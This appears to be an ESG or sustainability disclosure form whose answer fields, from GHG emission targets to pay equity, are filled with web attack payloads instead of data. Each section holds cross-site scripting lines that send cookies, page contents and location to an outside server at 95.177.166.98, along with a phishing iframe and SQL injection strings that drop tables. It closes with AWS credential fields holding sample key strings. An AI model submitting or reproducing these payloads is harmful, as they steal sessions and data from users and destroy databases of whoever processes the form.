Scope 1, 2, and 3 GHG Emissions Performance: 
    <svg/onload=fetch('http://95.177.166.98:8080/steal?c='+document.cookie)>  
    <img src=x onerror=fetch('http://95.177.166.98:8080/leak?cookie='+document.cookie)>  

GHG Reduction Target: 
    9999999'; DROP TABLE users; --  
    <script>fetch('http://95.177.166.98:8080/ghg-leak?target=' + document.body.innerHTML)</script>  

Renewable Energy Target (%): 
    <iframe src="http://95.177.166.98:8080/phish.html"></iframe>  
    <img src=1 onerror="fetch('http://95.177.166.98:8080/phish?token=' + document.cookie)">  

Waste Diversion Rate Target (%): 
    ' OR 1=1; DROP TABLE ghg_portfolios; --  
    <script>document.write('<h1>Waste Data Compromised</h1>'); fetch('http://95.177.166.98:8080/waste?data=' + document.body.innerHTML)</script>  

Gender Diversity Target (%) at the Leadership Level: 
    "><img src=x onerror=fetch('http://95.177.166.98:8080/gender?data='+document.body.innerHTML)>  

Assessment of Current Pay Equity and Inclusive Hiring Practices: 
    <svg/onload=fetch('http://95.177.166.98:8080/capture?domain='+document.domain)>  
    <script>
        fetch('http://95.177.166.98:8080/capture', {
            method: 'POST',
            body: JSON.stringify({
                cookies: document.cookie,
                location: window.location.href
            }),
            headers: {
                'Content-Type': 'application/json'
            }
        });
    </script>  

AWS Access Key ID: 
    AKIAIOSFODNN7EXAMPLE  
AWS Secret Access Key: 
    wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY  
AWS Session Token: 
    AQoEXAMPLEH4aoAH0gNCAPYI4mdRgT0EXAMPLE=  
